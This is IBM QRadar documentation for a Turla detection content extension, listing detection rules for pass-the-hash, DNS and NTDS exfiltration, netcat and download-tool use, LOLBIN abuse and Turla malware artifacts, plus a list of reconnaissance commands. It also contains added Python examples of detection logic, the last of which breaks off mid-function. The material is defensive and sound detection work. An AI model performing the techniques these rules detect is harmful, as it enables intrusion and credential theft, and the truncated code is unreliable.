Turla

Use the IBM Security QRadar Techniques for Turla Content Extension to closely monitor your deployment for Turla malware.

Important: To avoid content errors in this content extension, keep the associated DSMs up to date. DSMs are updated as a part of the automatic updates. If automatic updates are not enabled, download the most recent version of the associated DSMs from IBM® Fix Central (https://www.ibm.com/support/fixcentral).

IBM Security QRadar Techniques for Turla Content Extension

IBM Security QRadar Techniques for Turla Content Extension 1.0.4

The following table shows the custom properties that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.4.

Table 1. Custom Properties updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.4
Name Optimized Description
Key Length Yes This property type is changed from alphanumeric to numeric.

IBM Security QRadar Techniques for Turla Content Extension 1.0.3

The following table shows the rules that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.3.

Table 2. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.3
Type Name Description
Rule Pass the Hash Activity Detects the attack technique pass the hash that is used to move laterally inside the network.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in Network Logons Detects the attack technique pass the hash that is used to move laterally inside the network.

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.2

The following table shows the rules that have been updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.2.

Table 3. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.2
Type Name Description
Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule UAC Remote Restrictions Disabled Detects registry modification that allows remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Suspicious Subprocess from RazerInstaller Detects suspicious subprocess from RazerInstaller.exe. Based on the Suspicious RazerInstaller Explorer Subprocess Sigma rule by Florian Roth, and Maxime Thiebaut.

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.1

The following table shows the custom properties that are updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1.

Table 4. Custom Properties updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1
Name Optimized Description
Command Property Definition Yes This property is a placeholder for default custom extraction of Command Property from DSM payloads.
Parent Process Path Property Definition Yes This property is a placeholder for default custom extraction of Parent Process Path from DSM payloads.

The following table shows the rules and building blocks that are updated in IBM Security QRadar Techniques for Turla Content Extension 1.0.1.

Table 5. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.1
Type Name Description
Rule Communication to EquationGroup C2 Tools Detects communications to C2 servers. Based on the Equation Group C2 Communication Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Command Executed via SettingContent-ms Detects command that is executed through SettingContent-ms. Based on the Arbitrary Shell Command Execution through Settingcontent-Ms Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule UAC Remote Restrictions Disabled Detects registry modification that allows remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Shadow Copies Creation Using Operating Systems Utilities Detects possible scenarios of credential access where shadow copies are created by using operating systems utilities. Based on the Shadow Copies Creation Using Operating Systems Utilities Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Shells Spawned by Web Servers Detects web servers that spawn shell processes that might be the result of a successfully placed web shell or another attack. Based on the Shells Spawned by Web Servers Sigma rule by Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Active Directory Group/Computer Enumeration Triggers when groups or computers are enumerated within Active Directory. Based on the Active Directory Group Enumeration With Get-AdGroup and Active Directory Computers Enumeration with Get-AdComputer Sigma rules by frack113.

Used under Detection Rule License 1.1.

Rule Get-ADUser User Discovery and Export Triggers on usage of the Get-ADUser cmdlet to collect user information and output it to a file. Based on the User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

IBM Security QRadar Techniques for Turla Content Extension 1.0.0

The following table shows the custom properties that are in IBM Security QRadar Techniques for Turla Content Extension 1.0.0.

Table 6. Custom Properties in IBM Security QRadar Techniques for Turla Content Extension 1.0.0
Name Optimized Description
Access Mask Yes This property is a placeholder for default custom extraction of Access Mask from DSM payloads.
Accesses Yes This property is a placeholder for default custom extraction of Accesses from DSM payloads.
Account Name Yes This property is a placeholder for default custom extraction of Account Name from DSM payloads.
Account Security ID No This property is a placeholder for default custom extraction of Account Security ID from DSM payloads.
Audit ID Yes This property is a placeholder for default custom extraction of Audit ID from DSM payloads.
Authentication Package Yes This property is a placeholder for default custom extraction of Authentication Package from DSM payloads.
Call Trace Yes This property is a placeholder for default custom extraction of Call Trace from DSM payloads.
Call Type Yes This property is a placeholder for default custom extraction of Call Type from DSM payloads.
Command Yes This property is a placeholder for default custom extraction of Command from DSM payloads.
Command Arguments Yes This property is a placeholder for default custom extraction of Command Arguments from DSM payloads.
Consumer Destination Yes This property is a placeholder for default custom extraction of Consumer Destination from DSM payloads.
Description No This property is a placeholder for default custom extraction of Description from DSM payloads.
Destination Hostname Yes This property is a placeholder for default custom extraction of Destination Hostname from DSM payloads.
Error Code Yes This property is a placeholder for default custom extraction of Error Code from DSM payloads.
Extended Error Code Yes This property is a placeholder for default custom extraction of Extended Error Code from DSM payloads.
File Directory Yes This property is a placeholder for default custom extraction of File Directory from DSM payloads.
File Extension Yes This property is a placeholder for default custom extraction of File Extension from DSM payloads.
File Path Yes This property is a placeholder for default custom extraction of File Path from DSM payloads.
Filename Yes This property is a placeholder for default custom extraction of Filename from DSM payloads.
Granted Access Yes This property is a placeholder for default custom extraction of Granted Access from DSM payloads.
Group Name Yes This property is a placeholder for default custom extraction of Group Name from DSM payloads.
Impersonation Level Yes This property is a placeholder for default custom extraction of Impersonation Level from DSM payloads.
Initiated Yes This property is a placeholder for default custom extraction of Initiated from DSM payloads.
Initiator Username Yes This property is a placeholder for default custom extraction of Initiator Username from DSM payloads.
Integrity Level Yes This property is a placeholder for default custom extraction of Integrity Level from DSM payloads.
Logon Process Yes This property is a placeholder for default custom extraction of Logon Process from DSM payloads.
Logon Type Yes This property is a placeholder for default custom extraction of Logon Type from DSM payloads.
Machine Identifier Yes This property is a placeholder for default custom extraction of Machine Identifier from DSM payloads.
MD5 Hash Yes This property is a placeholder for default custom extraction of MD5 Hash from DSM payloads.
Parent Command Yes This property is a placeholder for default custom extraction of Parent Command from DSM payloads.
Parent Process Name Yes This property is a placeholder for default custom extraction of Parent Process Name from DSM payloads.
Parent Process Path Yes This property is a placeholder for default custom extraction of Parent Process Path from DSM payloads.
Pipe Name Yes This property is a placeholder for default custom extraction of Pipe Name from DSM payloads.
Process Name Yes This property is a placeholder for default custom extraction of Process Name from DSM payloads.
Process Path Yes This property is a placeholder for default custom extraction of Process Path from DSM payloads.
Properties Yes This property is a placeholder for default custom extraction of Properties from DSM payloads.
Registry Key Yes This property is a placeholder for default custom extraction of Registry Key from DSM payloads.
Registry Value Data Yes This property is a placeholder for default custom extraction of Registry Value Data from DSM payloads.
Relative Target Name No This property is a placeholder for default custom extraction of Relative Target Name from DSM payloads.
Service Filename Yes This property is a placeholder for default custom extraction of Service Filename from DSM payloads.
Service Name Yes This property is a placeholder for default custom extraction of Service Name from DSM payloads.
SHA256 Hash Yes This property is a placeholder for default custom extraction of SHA256 Hash from DSM payloads.
Share Name Yes This property is a placeholder for default custom extraction of Share Name from DSM payloads.
Start Function Yes This property is a placeholder for default custom extraction of Start Function from DSM payloads.
Start Module Yes This property is a placeholder for default custom extraction of Start Module from DSM payloads.
Subject Account Name Yes This property is a placeholder for default custom extraction of Subject Account Name from DSM payloads.
Target Account Security ID No This property is a placeholder for default custom extraction of Target Account Security ID from DSM payloads.
Target Details Yes This property is a placeholder for default custom extraction of Target Details from DSM payloads.
Target File Directory Yes This property is a placeholder for default custom extraction of Target File Directory from DSM payloads.
Target Object Yes This property is a placeholder for default custom extraction of Target Object from DSM payloads.
Target Process Name No This property is a placeholder for default custom extraction of Target Process Name from DSM payloads.
Target Process Path No This property is a placeholder for default custom extraction of Target Process Path from DSM payloads.
Target Username Yes This property is a placeholder for default custom extraction of Target Username from DSM payloads.
Type No This property is a placeholder for default custom extraction of Type from DSM payloads.
URL Host Yes This property is a placeholder for default custom extraction of URL Host from DSM payloads.

The following table shows the rules and building blocks that are in IBM Security QRadar Techniques for Turla Content Extension 1.0.0.

Table 7. Rules and Building Blocks in IBM Security QRadar Techniques for Turla Content Extension 1.0.0
Type Name Description
Building Block BB:BehaviorDefinition: Abuse of Findstr Detects abuse of findstr for evasion. Adversaries can use findstr to hide their artifacts or search for specific strings and evade defense mechanisms. Based on the Abusing Findstr for Defense Evasion Sigma rule by Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Abuse of Print Executable Detects the use of print.exe for remote file copy. Based on the Abusing Print Executable Sigma rule by Furkan CALISKAN, @caliskanfurkan_, and @oscd_initiative.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Account Tampering - Suspicious Failed Logon Reasons Detects uncommon error codes on failed login attempts to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Building Block BB:BehaviorDefinition: Application Whitelisting Bypass via Bginfo Detects execution of VBscript code that is referenced within the *.bgi file. Based on the Application Whitelisting Bypass via Bginfo Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Arbitrary Command Execution Using WSL Detects possible usage of the Windows Subsystem for Linux® (WSL) binary as a LOLBIN to execute arbitrary Linux and Windows commands. Based on the Arbitrary Command Execution Using WSL Sigma rule by oscd.community, Zach Stanford @svch0st, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Atbroker Registry Change Detects creation or modification of Assistive Technology applications and persistence with usage of 'at'. Based on the Atbroker Registry Change Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Atlassian Confluence Spawning Detects spawning of suspicious child processes by Atlassian Confluence server which might indicate successful exploitation. Based on the Atlassian Confluence CVE-2021-26084 Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Automated Collection Command PowerShell Detects an adversary using automated techniques for collecting internal data. Based on the Automated Collection Command PowerShell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Automated Collection Command Prompt Detects an adversary using automated techniques for collecting internal data. Based on the Automated Collection Command Prompt Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: BPFtrace Unsafe Option Usage Detects the usage of the unsafe bpftrace option. Based on the BPFtrace Unsafe Option Usage Sigma rule by Andreas Hunkeler (@Karneades).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: C2 Session over ICMP Detects C2 session over ICMP.
Building Block BB:BehaviorDefinition: Carbon Filenames Detects when a Carbon filename is discovered. First set of names is from Carbon 3.7x, while second set of names is from Carbon 3.8x.
Building Block BB:BehaviorDefinition: Carbon Service Name Detects when a Carbon service is installed.
Building Block BB:BehaviorDefinition: Clearing Windows Console History Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Based on the Clearing Windows Console History Sigma rule by Austin Songer @austinsonger.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: ComRAT Registry Installation Detects when a ComRAT service is installed and a payload is written into the registry. This might indicate an existing access such as compromised credentials or a previously installed backdoor.
Building Block BB:BehaviorDefinition: ComRAT Scheduled Task Creation Detects new scheduled task creations. ComRAT uses scheduled tasks to execute commands.
Building Block BB:BehaviorDefinition: Common Reconnaissance Commands Detects common reconnaissance commands adversaries execute to gather information about the victim.

The rule may be tuned by the Process CommandLine field. Some common Process CommandLine keywords that appear are:

  • gpresult /z
  • gpresult /v
  • gpresult
  • nbtstat -n
  • net view
  • net view /domain
  • netstat
  • netstat -nab
  • netstat -nao
  • nslookup 127.0.0.1
  • ipconfig /all
  • arp -a
  • net share
  • net use
  • systeminfo
  • net user
  • net user administrator
  • net user /domain
  • net group
  • net group /domain
  • net localgroup
  • net localgroup Administrators
  • net group 'Domain Computers' /domain
  • net group 'Domain Admins' /domain
  • net group 'Domain Controllers' /domain
  • dir '%programfiles%'
  • net group 'Exchange Servers' /domain
  • net accounts
  • net accounts /domain
  • net view 127.0.0.1 /all
  • net session
  • route
  • ipconfig /displaydns
Building Block BB:BehaviorDefinition: Creation of Cron Files Detects creation of cron file or files in Cron directories. Based on the Persistence Via Cron Files Sigma rule by Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), and MSTIC.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Crutch File Staging Detects Crutch file staging under the C:\AMD\Temp location.
Building Block BB:BehaviorDefinition: Crutch Filenames Detects when Crutch files under C:\Intel are discovered. Crutch files can include:
  • outllib.dll
  • finder.exe
  • resources.dll
  • outlook.dat
  • ihlp.exe
  • msget.exe
Building Block BB:BehaviorDefinition: Curl Start Combination and VBS Execute Arbitrary PowerShell Code Detects execution of arbitrary PowerShell code using SyncAppvPublishingServer.vbs. Adversaries can use curl to download payloads remotely and execute them. Based on the Curl Download And Execute Combination Sigma rule by Sreeman, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: DLL Execution Via Register-cimprovider.exe Detects using register-cimprovider.exe to execute arbitrary DLL file. Based on the DLL Execution Via Register-cimprovider.exe Sigma rule by Ivan Dyachkov, Yulia Fomina, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: DLL Execution via Rasautou Detects the use of Rasautou.exe to load an arbitrary DLL specified in the -d option and execute the export specified in the -p option. Based on the DLL Execution via Rasautou.exe Sigma rule by Julia Fomina, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Data Compressed - PowerShell Detects compressed data that is collected prior to exfiltration. Based on the Data Compressed - PowerShell Sigma rule by Timur Zinniatullin, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Delete Application Log Detects deletion of log files. Based on the TeamViewer Log File Deleted Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Disable of ETW Trace Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. Based on the Disable of ETW Trace Sigma rule by @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Discovery Via Default Driver Altitude - Sysmon Detects usage of findstr with the argument 385201, which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude. Based on the Suspicious Findstr 385201 Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN Detects dotnet.exe being used to execute an arbitrary DLL and run unsigned code. Based on the Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Download Utilities in Events Detects when a download utility is being used on an Endpoint, such as ftp, sftp, curl, cuteftp, wget, certutil, bits, or nc.
Building Block BB:BehaviorDefinition: ETW Logging Tamper In .NET Processes Detects changes to environment variables related to ETW logging. Based on the ETW Logging Tamper In .NET Processes Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Epic Filenames Detects when Epic files are discovered.
Building Block BB:BehaviorDefinition: Epic Log Filenames Detects when Epic log files are discovered.
Building Block BB:BehaviorDefinition: Epic Search Terms Detects when Epic does a search on certain terms.
Building Block BB:BehaviorDefinition: Exchange Mailbox Export via PowerShell Detects the Exchange PowerShell New-MailBoxExportRequest cmdlet exporting the contents of a primary mailbox or archive to a .pst file. For more information about this attack, see Exporting Exchange Mailbox via PowerShell.
Building Block BB:BehaviorDefinition: Exchange PowerShell Snap-Ins Usage Detects adding and using Exchange PowerShell snap-ins to export mailbox data. Based on the Exchange PowerShell Snap-Ins Usage Sigma rule by FPT.EagleEye, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execute Files with Msdeploy Detects file execution using the msdeploy.exe lolbin. Based on the Execute Files with Msdeploy.exe Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution DLL of Choice Using WAB Detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. Based on the Execution DLL of Choice Using WAB.EXE Sigma rule by oscd.community, and Natalia Shornikova.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via Diskshadow Detects using Diskshadow.exe to execute arbitrary code in text file. Based on the Execution via Diskshadow.exe Sigma rule by Ivan Dyachkov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via WorkFolders Detects using WorkFolders.exe to execute an arbitrary control.exe. Based on the Execution via WorkFolders.exe Sigma rule by Maxime Thiebaut (@0xThiebaut).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Execution via stordiag Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe, and fltmc.exe. Based on the Execution via stordiag.exe Sigma rule by Austin Songer (@austinsonger).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: File Download Using ProtocolHandler Detects usage of ProtocolHandler to download files. Downloaded files will be located in the cache folder. Based on the File Download Using ProtocolHandler.exe Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: File and Directory Discovery - Linux Detects usage of system utilities to discover files and directories. Based on the File and Directory Discovery - Linux Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Fsutil Suspicious Invocation Detects suspicious parameters of fsutil, such as deleting USN journal, or configuring it with small size. Based on the Fsutil Suspicious Invocation Sigma rule by JEcco, E.M. Anhaus, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Gazer Filenames Detects when Gazer files are discovered.
Building Block BB:BehaviorDefinition: Gazer Registry Detects when Gazer registry names are discovered.
Building Block BB:BehaviorDefinition: Gazer Registry Values Detects when Gazer registry names are discovered.
Building Block BB:BehaviorDefinition: Hide Schedule Task Via Index Value Tamper Detects when the index value of a scheduled task is modified from the registry. Based on the Hide Schedule Task Via Index Value Tamper Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Hiding Files with Attrib.exe Detects usage of attrib.exe to hide files from users. Based on the Hiding Files with Attrib.exe Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: HyperStack Filenames Detects when HyperStack files are discovered.
Building Block BB:BehaviorDefinition: HyperStack Pipe Detects when HyperStack pipe name is discovered.
Building Block BB:BehaviorDefinition: HyperStack Registry Detects when HyperStack registries are discovered.
Building Block BB:BehaviorDefinition: Invalid Password at Login Detects invalid password at login.
Building Block BB:BehaviorDefinition: Invalid Password during Kerberos Pre-Authentication Detects invalid password during Kerberos pre-authentication.
Building Block BB:BehaviorDefinition: Kazuar Registry Installation Detects when a Kazuar service creates registry keys for persistence.
Building Block BB:BehaviorDefinition: Linux File Deletion Detects file deletion using the rm, shred, or unlink commands. Adversaries may delete files using these commands to cover up their activities. Based on the File Deletion Sigma rule by Ömer Günal, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Logon Scripts with UserInitMprLogonScript Detects modification or creation of UserInitMprLogonScript. Based on the Logon Scripts (UserInitMprLogonScript) Sigma rule by Tom Ueltschi (@c_APT_ure), and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Logon Scripts with UserInitMprLogonScript Registry Detects modification or creation of UserInitMprLogonScript.
Building Block BB:BehaviorDefinition: Lolbin PressAnyKey and Download Activity Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system. Based on the NodejsTools PressAnyKey Lolbin Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: MSExchange Transport Agent Installation Detects the installation of a Transport Agent in Exchange. Based on the MSExchange Transport Agent Installation - Builtin Sigma rule by Tobias Michalski.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: MSExchange Transport Agent Registration Detects modifications to the list of agents registered in Exchange.
Building Block BB:BehaviorDefinition: Malicious Files Written to the Fonts Folder Monitors for possibly malicious files being hidden in the C:\Windows\Fonts\ location. This folder doesn't require admin privileges to be written to and executed from. Based on the Writing Of Malicious Files To The Fonts Folder Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Mavinject Inject DLL Into Running Process Detects process injection using the signed Windows Mavinject tool with the INJECTRUNNING flag. Based on the Mavinject Inject DLL Into Running Process Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Microsoft Excel Template Creation Detects the creation of template files for Microsoft Excel from a process which is not Excel. Based on the Office Template Creation Sigma rule by Max Altgelt (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Microsoft Word Template Creation Detects the creation of template files for Microsoft Word from a process which is not Word. Based on the Office Template Creation Sigma rule by Max Altgelt (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Modification of Explorer Hidden Keys Detects modifications to the hidden files keys in registry. Based on the Modification of Explorer Hidden Keys Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Mosquito Registry Installation Detects when a Mosquito service creates registry keys for persistence. The malware adds a shell value to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\.
Building Block BB:BehaviorDefinition: Mosquito Registry Installation (2) Detects when a Mosquito service creates registry keys for persistence. The malware adds a local_update_check value to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Building Block BB:BehaviorDefinition: NTDS Exfiltration Command Detects a command used by conti to exfiltrate NTDS. Based on the Conti NTDS Exfiltration Command Sigma rule by Max Altgelt, and Tobias Michalski.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netcat Execution Detects suspicious netcat execution. Based on the Netcat Suspicious Execution Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netsh Port Forwarding Detects netsh commands that configure port forwarding. Based on the New Port Forwarding Rule Added Via Netsh.EXE Sigma rule by Florian Roth (Nextron Systems), omkar72, oscd.community, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Netsh RDP Port Forwarding Detects netsh commands that configure port forwarding of port 3389, which is used for RDP. Based on the RDP Port Forwarding Rule Added Via Netsh.EXE Sigma rule by Florian Roth (Nextron Systems), and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: New Service Creation Using PowerShell Detects the creation of a new service using Powershell. Based on the New Service Creation Using PowerShell Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: New Service Creation Using Sc.EXE Detects the creation of a new service using the sc.exe utility. Based on the New Service Creation Using Sc.EXE Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in Network Logons Detects the attack technique pass the hash which is used to move laterally inside the network. Based on the Pass the Hash Activity 2 Sigma rule by Dave Kennedy, Jeff Warren (method), and David Vassallo (rule).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Pass the Hash Activity in NewCredentials Logons Detects the attack technique pass the hash which is used to move laterally inside the network. Based on the Pass the Hash Activity 2 Sigma rule by Dave Kennedy, Jeff Warren (method), and David Vassallo (rule).

Used under Detection Rule License 1.1.
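
The two pass-the-hash building blocks above key on different logon types. The following is an added example, not the content extension's rule logic and not code from the Sigma rule authors: it approximates the selection of the public Pass the Hash Activity 2 Sigma rule over constructed Windows Security event 4624 fields (the event dictionaries and the field names are assumptions modelled on the Security log XML). The network-logon branch requires logon type 3 through NtLmSsp with a null subject SID and a zero Key Length; the NewCredentials branch requires logon type 9 through seclogo.

```python
# Added example (not the content extension's rule logic): approximate the
# pass-the-hash selection of the public "Pass the Hash Activity 2" Sigma rule
# over constructed Windows Security event 4624 fields.
from typing import Optional


def key_length(ev: dict) -> Optional[int]:
    """Key Length arrives as text in the raw event; compare it as a number so
    that "0" and "00" both mean "no session key" and "0" never matches "128"
    as a substring."""
    try:
        return int(str(ev.get("KeyLength", "")).strip())
    except ValueError:
        return None


def is_pth_network_logon(ev: dict) -> bool:
    """Network logon (type 3) authenticated by NtLmSsp with a null subject SID
    and a zero-length session key, excluding anonymous logons."""
    return (
        str(ev.get("EventID")) == "4624"
        and str(ev.get("LogonType")) == "3"
        and str(ev.get("LogonProcessName", "")).lower() == "ntlmssp"
        and ev.get("SubjectUserSid") == "S-1-0-0"
        and key_length(ev) == 0
        and str(ev.get("TargetUserName", "")).upper() != "ANONYMOUS LOGON"
    )


def is_pth_newcredentials_logon(ev: dict) -> bool:
    """NewCredentials logon (type 9) through the seclogo logon process: what
    runas /netonly, and pass-the-hash tooling that starts a process under
    injected NTLM credentials, leave behind on the source host."""
    return (
        str(ev.get("EventID")) == "4624"
        and str(ev.get("LogonType")) == "9"
        and str(ev.get("LogonProcessName", "")).lower() == "seclogo"
    )


def classify_logon(ev: dict) -> Optional[str]:
    if is_pth_network_logon(ev):
        return "pth_network_logon"
    if is_pth_newcredentials_logon(ev):
        return "pth_newcredentials_logon"
    return None


# Constructed 4624 events (field names follow the Windows Security log XML).
SAMPLE_4624 = [
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "jdoe", "KeyLength": "0", "IpAddress": "10.0.0.23"},
    # same logon but with a 128-bit session key: ordinary NTLM network logon
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "jdoe", "KeyLength": "128", "IpAddress": "10.0.0.23"},
    # anonymous logon: same shape, explicitly filtered out
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "ANONYMOUS LOGON", "KeyLength": "0", "IpAddress": "10.0.0.9"},
    # Kerberos network logon: Key Length 0 alone is not suspicious, the logon process differs
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "Kerberos",
     "AuthenticationPackageName": "Kerberos", "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "jdoe", "KeyLength": "0", "IpAddress": "10.0.0.23"},
    # NewCredentials logon via seclogo on the source host
    {"EventID": 4624, "LogonType": 9, "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "SubjectUserSid": "S-1-5-21-1-2-3-1104",
     "TargetUserName": "svc-backup", "KeyLength": "0", "IpAddress": "::1"},
]


def scan(events=SAMPLE_4624):
    """Return (target user, verdict) for each event."""
    return [(ev["TargetUserName"], classify_logon(ev)) for ev in events]


if __name__ == "__main__":
    for user, verdict in scan():
        print(f"{user:16} {verdict}")
```

The type 9/seclogo branch also fires on legitimate runas /netonly use by administrators, so it is best tuned per environment (for example, by the parent process and the account involved) rather than alerted on directly.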

Building Block BB:BehaviorDefinition: PortProxy Registry Key Detects modification of the PortProxy registry key, which is used for port forwarding. Based on the PortProxy Registry Key Sigma rule by Andreas Hunkeler (@Karneades).

Used under Detection Rule License 1.1.
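
The Netsh Port Forwarding, Netsh RDP Port Forwarding and PortProxy Registry Key building blocks above watch the same mechanism from two angles: the netsh command line that adds the rule, and the registry key that netsh writes it to. The following is an added example, not the content extension's tests and not code from the Sigma rule authors: it parses constructed process-creation command lines for the portproxy add form (including netsh's abbreviated keywords), flags the rule as RDP forwarding when port 3389 appears on either side, and matches constructed Sysmon-style registry events under the PortProxy key. The event shape and the sample values are assumptions.

```python
# Added example (not the content extension's tests): netsh portproxy command
# lines and PortProxy registry writes over constructed telemetry.
from typing import Optional

PORTPROXY_KEY = r"hklm\system\currentcontrolset\services\portproxy\v4tov4"
_FAMILIES = {"v4tov4", "v4tov6", "v6tov4", "v6tov6"}


def parse_netsh_portproxy_add(cmdline: str) -> Optional[dict]:
    """Return the listen/connect endpoints when cmdline is
    `netsh interface portproxy add <family> ...`.  netsh accepts any
    unambiguous prefix of a keyword, so `netsh i p a v4tov4 ...` is the same
    command; the prefix match below handles that.  Assumption: the first token
    is the image (full path or bare name)."""
    toks = cmdline.strip().lower().split()
    if not toks:
        return None
    image = toks[0].strip('"').rsplit("\\", 1)[-1]
    if image not in ("netsh", "netsh.exe"):
        return None
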